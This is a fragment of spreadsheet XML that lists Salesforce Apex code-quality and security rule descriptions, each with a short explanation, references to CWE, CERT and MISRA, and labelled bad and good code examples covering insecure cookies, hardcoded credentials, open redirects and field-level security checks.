&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/311"&gt;MITRE, CWE-311&lt;/a&gt; - Missing Encryption of Sensitive Data&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/315"&gt;MITRE, CWE-315&lt;/a&gt; - Cleartext Storage of Sensitive Information in a Cookie&lt;/li&gt;
	&lt;li&gt;&lt;a href="https://cwe.mitre.org/data/definitions/614.html"&gt;MITRE, CWE-614&lt;/a&gt; - Sensitive Cookie in HTTPS Session Without 'Secure' Attribute&lt;/li&gt;
	&lt;li&gt;OWASP Top 10 2021 Category A7 - Identification and Authentication Failures &lt;/li&gt;
	&lt;li&gt;OWASP Top 10 2021 Category A2 - Cryptographic Failures&lt;/li&gt;
	&lt;li&gt;&lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    public void foo () {     
       langCookie = new Cookie('uLang', userLanguage, null, -1, false); //Bad: the cookie can be sent over HTTP.
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidSoqlWithNullInWhere</t>
  </si>
  <si>
    <t>Avoid using null conditions in SOQL WHERE clause.</t>
  </si>
  <si>
    <t>By default, the index tables do not include records that are null (records with empty values).
Therefore, if we want to filter a field which is equal to null, the index will not be applied. SOQL queries require full scans, which can be painfully slow on large data volumes (LDV).
It's up to the developer to review the code to determine whether or not a fix is needed.
&lt;br/&gt;
You can work with Salesforce Customer Support to create custom indexes that include null rows.
Even if you already have custom indexes on your custom fields, you must explicitly enable and rebuild them to get the empty-value rows indexed.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Something {
	public static void main( String as[] ) {
		Contact[] lst = [ SELECT Id, Name FROM Contact WHERE CustomField__c = null; ];  //Bad: this is not recommended.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ConstructorCallsOverridableMethod</t>
  </si>
  <si>
    <t>Constructor Calls Overridable Method</t>
  </si>
  <si>
    <t>Calling overridable methods during construction poses a risk of invoking methods on an incompletely 
constructed object and can be difficult to debug.
It may leave the sub-class unable to construct its superclass or forced to replicate the construction 
process completely within itself, losing the ability to call super().  If the default constructor 
contains a call to an overridable method, the subclass may be completely uninstantiable.   Note that 
this includes method calls throughout the control flow graph - i.e., if a constructor Foo() calls a 
private method bar() that calls a public method buz(), this denotes a problem.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class SeniorClass {
  public SeniorClass(){
      toString(); 			  //Bad: toString() may throw NullPointerException if overridden.
  }
  public virtual String toString(){
    return 'IAmSeniorClass';
  }
}
public class JuniorClass extends SeniorClass {
  private String name;
  public JuniorClass(){
    super();  				//Bad: Automatic call to super() leads to NullPointerException.
    name = 'JuniorClass';
  }
  public virtual String toString(){
    return name.toUpperCase();
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyFinallyBlock</t>
  </si>
  <si>
    <t>Empty Finally Block</t>
  </si>
  <si>
    <t>Avoid empty finally blocks. They serve no purpose and should be removed.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 public void bar() {
  try {
    Integer x=2;
   } finally {
    			//Bad: Nothing is done here.
   }
 }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnreachableCode</t>
  </si>
  <si>
    <t>Unreachable Code</t>
  </si>
  <si>
    <t>Code that is unreachable will never be executed.  Consider refactoring any methods with unreachable code.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
class Bar{
	public void foo() {
		if (false) {
		   x = 1;			//Bad: This line will never execute.
		}
	}
	public void foo() {
		while (true) {
		   break;
		   x = 1;			//Bad: This line after 'break' will never be executed.
		}
	}
	public void fooTwo() {
		while (true) {
		   x = 1;
		   break;			//Good: The assignment can be executed.
		}
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CatchBlockShouldDoMoreThanRethrow</t>
  </si>
  <si>
    <t>Catch Block Should Do More Than Rethrow</t>
  </si>
  <si>
    <t>Simply re-throwing an exception in a catch block serves no purpose as it would appear anyway.  Catch blocks that do nothing but rethrow an exception should either be changed or removed.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void doSomething() {
  try {
    doHeapsOfStuff();
  } catch (Exception e) {
    throw e;   //Bad: This serves no purpose.
  }
}
public void doSomethingElse() {
  try {
    doHeapsOfStuff();
  } catch (Exception e) {
    System.debug(e.getMessage());     //Good: The exception triggers some logic and is handled within the catch block.
    throw e;     
  }
}
  &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CyclomaticComplexity</t>
  </si>
  <si>
    <t>Cyclomatic Complexity</t>
  </si>
  <si>
    <t>Complexity directly affects maintenance costs. It is determined by the number of decision points in a method 
plus one for the method entry.  The decision points include 'if', 'while', 'for', and 'case labels' calls.  
Generally, numbers ranging from 1-4 denote low complexity, 5-7 denote moderate complexity, 8-10 denote
high complexity, and 11+ is very high complexity.  Consider breaking the method into smaller methods.
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {		      
   	public void example() {			//Bad: This method has a Cyclomatic Complexity of 10.
1		if (a == b) {
2           if (a1 == b1) {
                fiddle();
3			} else if (a2 == b2) {
                fiddle();
4           } else {
                fiddle();
            }
5           } else if (c == d) {
                while (c == d) {
                    fiddle();
                }
6           } else if (e == f) {
                for (Integer n = 0; n &amp;lt; h; n++) {
                    fiddle();
                }
7           } else {
8               if (a1 == b1) {
                	fiddle();
9  				} else if (a2 == b2) {
                	fiddle();
10            	} else {
                	fiddle();
            	}
            }
    	}
    }
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidPublicFields</t>
  </si>
  <si>
    <t>Class Variable Fields should not have Public Accessibility</t>
  </si>
  <si>
    <t>Public class variables have some disadvantages:&lt;br/&gt;
      	&lt;ul&gt;
      		&lt;li&gt;The internal representation is exposed, and thus cannot be easily changed&lt;/li&gt;
      		&lt;li&gt;When the value is changed in an unexpected way (for example nulled), the implementation may not handle it correctly&lt;/li&gt;
      		&lt;li&gt;Additional validation logic cannot be added&lt;/li&gt;
      	&lt;/ul&gt;
      	&lt;br/&gt;
      	&lt;h2&gt;See&lt;/h2&gt;
      	&lt;ul&gt;
		  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/493.html"&gt;MITRE, CWE-493&lt;/a&gt; - Critical Public Variable Without Final Modifier &lt;/li&gt;
		&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
  public class MyClass {
  	public static final integer SOME_CONSTANT = 0;     //Good: Constants are not checked.
  	private String firstName;                          //Good.
  	public String FIRSTNAME_OVERRIDE;                 //Bad: Not recommended.
  	public String lastName { get; set; }               //Good.
  	@AuraEnabled public String lastName               //Good. AuraEnabled is not checked
  	public String getFirstName() {
    	return firstName;
  	}
 	public void setFirstName(String firstName) {
	 	this.firstName = firstName;
  	}
   }
   //Good. This class is considered a 'Data Transport Object' and is not checked
   public class MyClass {
      public String field1;
      public String field2;
   }
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidHardCodedCredential</t>
  </si>
  <si>
    <t>Avoid Using Hard Coded Credentials for Authentication</t>
  </si>
  <si>
    <t>To detect hardcoded credentials used in requests to an endpoint, this rule looks for HttpRequest.setHeader methods with 'Authorization' passed as the first parameter.
&lt;br/&gt;
You should refrain from hardcoding credentials:
&lt;ul&gt;
  &lt;li&gt;They are hard to mantain by being mixed in application code&lt;/li&gt; 
  &lt;li&gt;Particularly hard to update them when used from different classes&lt;/li&gt; 
  &lt;li&gt;Granting a developer access to the codebase means granting knowledge
     of credentials, keeping a two-level access is not possible.&lt;/li&gt; 
  &lt;li&gt;Using different credentials for different environments is troublesome
     and error-prone.&lt;/li&gt; 
&lt;/ul&gt;
Instead, you should use *Named Credentials* and a callout endpoint.&lt;br/&gt;
&lt;br/&gt;
For more information, you can see &lt;a href="https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/apex_callouts_named_credentials.htm"&gt;here&lt;/a&gt;.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/798"&gt;MITRE, CWE-798&lt;/a&gt; - Use of Hard-coded Credentials &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/259"&gt;MITRE, CWE-259&lt;/a&gt; - Use of Hard-coded Password &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/qQCHAQ"&gt;CERT, MSC03-J.&lt;/a&gt; - Never hard code sensitive information &lt;/li&gt;
  &lt;li&gt; OWASP Top 10 2021 Category A7 - Identification and Authentication Failure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="http://h3xstream.github.io/find-sec-bugs/bugs.htm#HARD_CODE_PASSWORD"&gt;Hard Coded Password&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
    public void foo(String username, String password) {
        HttpRequest req = new HttpRequest();
        Blob headerValue = Blob.valueOf(username + ':' + password);
        String authorizationHeader = 'BASIC ' + EncodingUtil.base64Encode(headerValue);
        req.setHeader('Authorization', authorizationHeader);    //Bad: Hardcoded credentials are not recommended.
        req.setEndpoint('callout:***My_Named_Credential***/some_path');    //Good: Using named credentials is recommended.
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ExcessiveClassLength</t>
  </si>
  <si>
    <t>Excessive Class Length</t>
  </si>
  <si>
    <t>Excessive class file length is an indication that the class may be burdened with excessive 
responsibilities that could be provided by external classes or functions. In breaking these methods
apart the code becomes more manageable and ripe for reuse.
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {          //Bad: Consider splitting the class apart.
	public void bar1() {
      // do stuff
	}
	public void bar2() {
      // do stuff
	}
	.......  // 1000 lines of code later...
    public void barN() {
      // do stuff
	}
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:FieldDeclarationsShouldBeAtStartOfClass</t>
  </si>
  <si>
    <t>Field Declarations Should be at the Start of a Class</t>
  </si>
  <si>
    <t>Fields should be declared at the top of the class, before any method declarations, constructors, initializers or inner classes.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class HelloWorldBean {
  private String _thing;				//Good: Field declared before methods and/or inner classes.
  public String getMessage() {
    return 'Hello World!';
  }
  private String _fieldInWrongLocation;	//Bad: Field declared after methods and/or inner classes.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ExcessiveParameterList</t>
  </si>
  <si>
    <t>Excessive Parameter List</t>
  </si>
  <si>
    <t>Methods with numerous parameters are a challenge to maintain, especially if most of them share the
same datatype. These situations usually denote the need for new objects to wrap the numerous parameters.
   &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void addPerson(		//Bad: Too many arguments liable to be mixed up.
	Integer birthYear, Integer birthMonth, Integer birthDate, Integer height, Integer weight, Integer ssn) {
	. . . .
}
public void addPerson(		//Good: Preferred approach is to use a data transport object.
	Date birthdate, BodyMeasurements measurements, Integer ssn) {
	. . . .
}
   &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:PreserveStackTrace</t>
  </si>
  <si>
    <t>Preserve Stack Trace</t>
  </si>
  <si>
    <t>Throwing a new exception from a catch block without passing the original exception into the
new exception will cause the original stack trace to be lost making it difficult to debug 
effectively. 
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {				//Good: Preferred.
    void good() {
        try{
            Integer.parseInt('a');
        } catch(Exception e){
            throw new Exception(e);
        }
    }
    void bad() {				//Bad: Not recommended.
        try{
            Integer.parseInt('a');
        } catch(Exception e){
            throw new Exception(e.getMessage());
        }
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:TestClassNaming</t>
  </si>
  <si>
    <t>Test Class Names Should Include 'Test'</t>
  </si>
  <si>
    <t>Test classes should include the word 'Test' in their class names.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Bad: Test class name doesn't include 'Test'
@isTest
public class MyClass{
    static testMethod void testMethod(){
      //test code
    }
}
//Good: Test class name includes 'Test'
@isTest
public class MyClassTest{
    static testMethod void testMethod(){
      //test code
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:BrokenMathCast</t>
  </si>
  <si>
    <t>Unexpected Casting of Types</t>
  </si>
  <si>
    <t>When arithmetic is performed on a type, the type remains the same even if the result is a different type.&lt;br/&gt;
&lt;br/&gt;
For example dividing two integers and putting the result in a double will not return a fractional result as you expected.&lt;br/&gt;
&lt;br/&gt;
Likewise, multiplying two large integers and putting the result in a long may silently overflow the integer resulting in a wrong number.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; MISRA C++:2008, 5-0-8 - An explicit integral or floating-point conversion shall not increase the size of the underlying type of a cvalue
  expression. &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/190"&gt;MITRE, CWE-190&lt;/a&gt; - Integer Overflow or Wraparound &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/woIyAQ"&gt;CERT, NUM50-J.&lt;/a&gt; - Convert integers to floating point for floating-point
  operations &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/AxE"&gt;CERT, INT18-C.&lt;/a&gt; - Evaluate integer expressions in a larger size before
  comparing or assigning to that size &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat2"&gt;SANS Top 25&lt;/a&gt; - Risky Resource Management &lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
double twoThirds = 2/3;  //Bad: Yields 0.0
double twoThirds = 2/3f;  //Good: Yields 0.666...
double twoThirds = (float)2/3;  //Good: Yields 0.666...
long millisInYear = 1000*3600*24*365;  //Bad: Integer overflow. Yields 2147483649.
long millisInYear = 1000L*3600*24*365;  //Good: Long multiplication. Yields 31536000000.
long millisInYear = (long)1000*3600*24*365;  //Good: Long multiplication. Yields 31536000000.
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnconditionalIfStatement</t>
  </si>
  <si>
    <t>Unconditional If Statement</t>
  </si>
  <si>
    <t>Do not use 'if' statements whose conditionals are always true or always false.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/489.html"&gt;MITRE, CWE-489&lt;/a&gt; - Leftover Debug Code&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/570.html"&gt;MITRE, CWE-570&lt;/a&gt; - Expression is Always False&lt;/li&gt;
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/571.html"&gt;MITRE, CWE-571&lt;/a&gt; - Expression is Always True&lt;/li&gt;
	&lt;li&gt;MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted.&lt;/li&gt;
	&lt;li&gt;MISRA C:2012, 14.3 - Controlling expressions shall not be invariant&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void close() {
    if (true) {    //Bad: There is no reason for a permanently true 'if' statement, this should be removed. 
      // ...
    }					 
  }
}
public class Foo {
  public void close() {
    if (false) {    //Bad: A permanently false 'if' statement will never run.  
      // ...
    }					 
  }
}
public class Foo {
  public void close() {	  
    // ...    //Good: Remove the permanent 'if statement.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:FieldLevelSecurity</t>
  </si>
  <si>
    <t>Field Level Security Vulnerabilities</t>
  </si>
  <si>
    <t>This rule makes sure that the code checks for access permissions before running a SOQL, SOSL, or DML operation.&lt;br/&gt;
This prevents access to protected resources by users without the correct privalages.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;&lt;a href="https://cwe.mitre.org/data/definitions/282.html"&gt;CWE-282&lt;/a&gt; - Improper Ownership Management&lt;/li&gt;
	&lt;li&gt;See &lt;a href="https://cwe.mitre.org/data/definitions/284.html"&gt;CWE-284&lt;/a&gt; - Improper Access Control&lt;/li&gt;
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo { 	
	public void justGiveMeFoo() {
	 	AggregateResult[] test = [SELECT Id FROM Opportunity];  //Bad: The resource is accessed without checking permissions.
	}
	public void giveMeFooSafely() {
		if (Opportunity.sObjectType.getDescribe().isAccessible()) {  //Good: Permissions are checked before any resources are accessed.
	 		return;
	 	}
	 	AggregateResult[] test = [SELECT Id FROM Opportunity]; 
	}
	public void giveMeFooSafelyWithEnforcedSecurity() {
	 	AggregateResult[] test = [SELECT Id FROM Opportunity WITH SECURITY_ENFORCED]; //Good: Permissions are checked using the WITH SECURITY_ENFORCED clause
	}
	public void giveMeFooSafelyWithUserModeSecurity() {
		AggregateResult[] test = [SELECT Id FROM Opportunity WITH USER_MODE]; //Best: Permissions are checked using the WITH USER_MODE clause
	}
} 
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:NPathComplexity</t>
  </si>
  <si>
    <t>NPath Complexity</t>
  </si>
  <si>
    <t>The NPath complexity of a method is the number of acyclic execution paths through that method.
A threshold of 200 is generally considered the point where measures should be taken to reduce 
complexity and increase readability.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
void bar() {						// this is something more complex than it needs to be,
	if (y) {						// it should be broken down into smaller methods or functions
		for (j = 0; j &lt; m; j++) {
			if (j &gt; r) {
				doSomething();
				while (f &lt; 5 ) {
					anotherThing();
					f -= 27;
					}
				} else {
					tryThis();
				}
			}
		}
		if ( r - n &gt; 45) {
		   while (doMagic()) {
		      findRabbits();
		   }
		}
		try {
			doSomethingDangerous();
		} catch (Exception ex) {
			makeAmends();
			} finally {
				dontDoItAgain();
				}
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedNullCheckInEquals</t>
  </si>
  <si>
    <t>Unused Null Check in Equals</t>
  </si>
  <si>
    <t>After checking an object reference for null, you should invoke equals() on that object rather than passing it to another object's equals() method.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Test {
  public String method1() { return 'ok';}
  public String method2() { return null;}
  public void method(String a) {
    String b;
	// I don't know if method1() can be 'null'
	// but I know 'a' is not null..
	// I'd better write a.equals(method1())
	if (a != null &amp;&amp; method1().equals(a)) { //Bad: will trigger the rule.
		//whatever
	}
	if (method1().equals(a) &amp;&amp; a != null) { //Good: won't trigger the rule.
		//whatever
	}
	if (a != null &amp;&amp; method1().equals(b)) { //Good: won't trigger the rule.
		//whatever
	}
	if (a != null &amp;&amp; 'LITERAL'.equals(a)) { //Good: won't trigger the rule.
		//whatever
	}
	if (a != null &amp;&amp; !a.equals('go')) { //Good: won't trigger the rule.
		a=method2();
		if (method1().equals(a)) {
			//whatever
		}
  	}
  }
}
			&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UnusedFormalParameter</t>
  </si>
  <si>
    <t>Unused Formal Parameter</t>
  </si>
  <si>
    <t>Avoid passing parameters to methods or constructors without actually referencing them in the method body.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions.&lt;/li&gt;
	&lt;li&gt;MISRA C:2012, 2.7 - There should be no unused parameters in functions&lt;/li&gt;
	&lt;li&gt;&lt;a href="https://wiki.sei.cmu.edu/confluence/display/c/MSC12-C.+Detect+and+remove+code+that+has+no+effect+or+is+never+executed"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never executed&lt;/li&gt;
&lt;/ul&gt;
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	private void bar(String howdy) {
		//Bad: howdy is not used.
	}
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:OpenRedirect</t>
  </si>
  <si>
    <t>URL Redirection to Untrusted Site</t>
  </si>
  <si>
    <t>Checks against redirects to user-controlled locations. 
Untrusted input could cause an attacker to redirect the user to a malicious site and
an attacker may be able to launch a phishing scam and steal a users credentials.&lt;br/&gt;
&lt;br/&gt;
See &lt;a href="http://cwe.mitre.org/data/definitions/601.html"&gt;MITRE, CWE-601&lt;/a&gt; - URL Redirection to Untrusted Site ('Open Redirect')
&lt;br/&gt;
Apex recommendations - &lt;a href="https://developer.salesforce.com/page/Secure_Coding_Arbitrary_Redirect"&gt;developer.salesforce.com&lt;/a&gt; - Secure Coding, Arbitrary Redirect
&lt;BR/&gt;
Using the retURL, startURL, saveURL, cancelURL parameters are protected by Salesforce.
This protection is designed to safely redirect only to domains located within the *.salesforce.com, *.visual.force.com, and *.content.force.com space.
Anything else returns an error message.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class without sharing Foo {
    String unsafeLocation = ApexPages.currentPage().getParameters().get('url_param'); //Bad: this is not recommended.
    PageReference unsafePage() {
      if (unsafeLocation )
       return new PageReference(unsafeLocation);
    }
    PageReference safePage() {
      String retURL = ApexPages.currentPage().getParameters().get('retURL'); //Good: retURL uses internal Salesforce protection mechanism
      return new PageReference(retURL);
    }
    PageReference safePage() {
      if ( unsafeLocation == 'something ) {                      //Good: this is one possibility for a safer redirect.
        return new PageReference('/somewhere')
      } else { 
        return new pageReference('/somewhere-else')
      }
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:SwitchStmtsShouldHaveDefault</t>
  </si>
  <si>
    <t>Switch Statements Should Have a When Else Case</t>
  </si>
  <si>
    <t>Switch statements should always use a 'when else' case to account for all values and avoid unexpected functionality.&lt;br/&gt;
&lt;br/&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
	&lt;li&gt;MISRA C:2004, 15.0 - The MISRA C switch syntax shall be used.
	&lt;li&gt;MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause
	&lt;li&gt;MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement.
	&lt;li&gt;MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause
	&lt;li&gt;MISRA C:2012, 16.1 - All switch statements shall be well-formed
	&lt;li&gt;MISRA C:2012, 16.4 - Every switch statement shall have a default label
	&lt;li&gt;MISRA C:2012, 16.5 - A default label shall appear as either the first or the last switch label of a switch statement
	&lt;li&gt;&lt;a href="http://cwe.mitre.org/data/definitions/478.html"&gt;MITRE, CWE-478&lt;/a&gt; - Missing Default Case in Switch Statement
	&lt;li&gt;&lt;a href="https://www.securecoding.cert.org/confluence/x/YgE"&gt;CERT, MSC01-C.&lt;/a&gt; - Strive for logical completeness
&lt;/ul&gt;
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public void bar() {
    Integer x = 2;
    switch on x {
      when 1 { 
        Integer j = 6;
      }
      when 2 { 
        Integer j = 8;
      }
          //Bad: Missing a default.
    }
    switch on x {
      when 1 { 
        Integer j = 6;
      }
      when 2 { 
        Integer j = 8;
      }
      when else {
        Integer j = 100;  //Good: a default case is specified.
      }
    }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseObjectForClearerAPI</t>
  </si>
  <si>
    <t>Use Object for Clearer API</t>
  </si>
  <si>
    <t>When you write a public method, you should be thinking in terms of an API. If your method is public, it means other class
will use it, therefore, you want (or need) to offer a comprehensive and evolutive API. If you pass a lot of information
as a simple series of Strings, you may think of using an Object to represent all those information. You'll get a simplier 
API (such as doWork(Workload workload), rather than a tedious series of Strings) and more importantly, if you need at some
point to pass extra data, you'll be able to do so by simply modifying or extending Workload without any modification to
your API.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class MyClass {
  public void connect(String username,
    String pssd, 
    String databaseName, 
    String databaseAdress) { ... }  //Bad: Not recommended.
  public void connectTwo(UserData data) { ... }  //Good: This is preferred. Makes for cleaner code.
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:ForLoopShouldBeWhileLoop</t>
  </si>
  <si>
    <t>For Loop Should Be While Loop</t>
  </si>
  <si>
    <t>Some For loops can be simplified to While loops, this makes them more concise.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
	void bar() {
		for (;true;) true;		//Bad: The for loop contains no Initialiser or Update.
			while(true){		//Good: Use while loop instead.
			}   			
	}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:OldApiVersion</t>
  </si>
  <si>
    <t>API Version is too old</t>
  </si>
  <si>
    <t>This rule identifies classes which are using older versions of the API. Change the API Version of this class.
  &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&gt;
&amp;lt;ApexClass xmlns=&amp;quot;http://soap.sforce.com/2006/04/metadata&amp;quot; &gt;
    &amp;lt;apiVersion&gt;19.0&amp;lt;/apiVersion&gt;
    &amp;lt;status&gt;Active&amp;lt;/status&gt;
&amp;lt;/ApexClass&gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:EmptyIfStmt</t>
  </si>
  <si>
    <t>Empty If Statement</t>
  </si>
  <si>
    <t>Avoid 'if' statements where a condition is checked but nothing is done about it.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
 void bar(Integer x) {
  if (x == 0) {
  					//Bad: Nothing is done here.
  }
 }
}
       &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:MissingStaticMethodInNonInstantiatableClass</t>
  </si>
  <si>
    <t>Missing Static Method in Non Instantiatable Class</t>
  </si>
  <si>
    <t>A class that has private constructors and does not have any static methods or fields cannot be used.
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
//Bad: This class is unusable, since it cannot be
// instantiated (private constructor),
// and no static method can be called.
public class Foo {
  private Foo() {}
  void foo() {}
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidLiteralsInIfCondition</t>
  </si>
  <si>
    <t>Avoid Literals in If Condition</t>
  </si>
  <si>
    <t>Avoid using hard-coded literals in conditional statements. By declaring them as static variables
or private members with descriptive names maintainability is enhanced. By default, the literals "-1" and "0" are ignored.
More exceptions can be defined with the property "ignoreMagicNumbers".
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
private static final Integer TEN = 10;
public void downCastPrimitiveType() {
    if (i == 10) {		//Bad: this is a magic number, buried in a method.
    	doSomething();
    }
    if (i == TEN) {		//Good: preferred approach.
    	doSomething();
    }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CommentSize</t>
  </si>
  <si>
    <t>Comment is Too Large</t>
  </si>
  <si>
    <t>Determines whether the dimensions of comments found are within the specified limits.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
/*
*
*	comment.  		//Bad: Too many lines.
*
*
*
*
*
*
*
*
*
*/
/*
*  	comment.		//Good: Can be shortened.
*/
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:AvoidNestedSwitchStmts</t>
  </si>
  <si>
    <t>Avoid Nested Switch Statements</t>
  </si>
  <si>
    <t>Avoid creating nested 'switch' statements since they are error-prone, harder to read and harder to maintain.
    &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo {
  public void bar(Integer x, Integer y, Integer z) {
    switch on x{
      when 0 {}
      when 1 {
        switch on y {    //Bad: Nested switch statements are confusing.
          when 0 {}
        }
      }
    }
  }
}
    &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:CallSuperTwiceInConstructor</t>
  </si>
  <si>
    <t>Avoid Calling Super Twice in a Constructor</t>
  </si>
  <si>
    <t>Calling super in a constructor multiple times can be confusing. Try to use a single constructor
      &lt;BR&gt;&lt;h2&gt;Example:&lt;/h2&gt;&lt;pre&gt;
public class Foo extends Bar{
  public Foo(boolean p) {
   if ( p )
   	super('true value');
   else
   	super('false value'); //Bad: This can be confusing.
  }
}
      &lt;/pre&gt;</t>
  </si>
  <si>
    <t>sf:UseLocaleWithCaseConversions</t>
  </si>
  <si>
